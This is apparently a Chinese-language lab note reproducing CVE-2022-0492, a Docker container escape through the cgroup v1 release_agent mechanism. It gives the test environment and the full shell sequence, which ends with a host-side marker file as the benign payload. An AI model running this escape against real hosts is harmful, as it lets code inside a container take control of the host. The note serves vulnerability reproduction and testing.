Docker >> Container Escape
CVE-2022-0492
參考資訊:
1. CVE-2022-0492
2. containerd.io_1.2.13-2_amd64.deb
3. docker-ce_19.03.10~3-0~ubuntu-focal_amd64.deb
4. docker-ce-cli_19.03.10~3-0~ubuntu-focal_amd64.deb
測試環境:
Ubuntu 20.04 (5.4.0-21-generic)
Docker version 19.03.10, build 9424aeaee9
測試步驟:
$ sudo docker run --rm -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined ubuntu:22.04 /bin/bash
cve:/# unshare -UrmC --propagation=unchanged bash
cve:/# mkdir /tmp/test
cve:/# mount -t cgroup -o rdma cgroup /tmp/test
cve:/# mkdir /tmp/test/x
cve:/# echo 1 > /tmp/test/x/notify_on_release
cve:/# echo '#!/bin/sh' > /cmd
cve:/# echo "touch /tmp/cve_test" >> /cmd
cve:/# chmod 0777 /cmd
cve:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
cve:/# echo "$host_path/cmd" > /tmp/test/release_agent
cve:/# sh -c "echo \$\$ > /tmp/test/x/cgroup.procs"
cve:/# exit
cve:/# exit
# ls /tmp
cve_test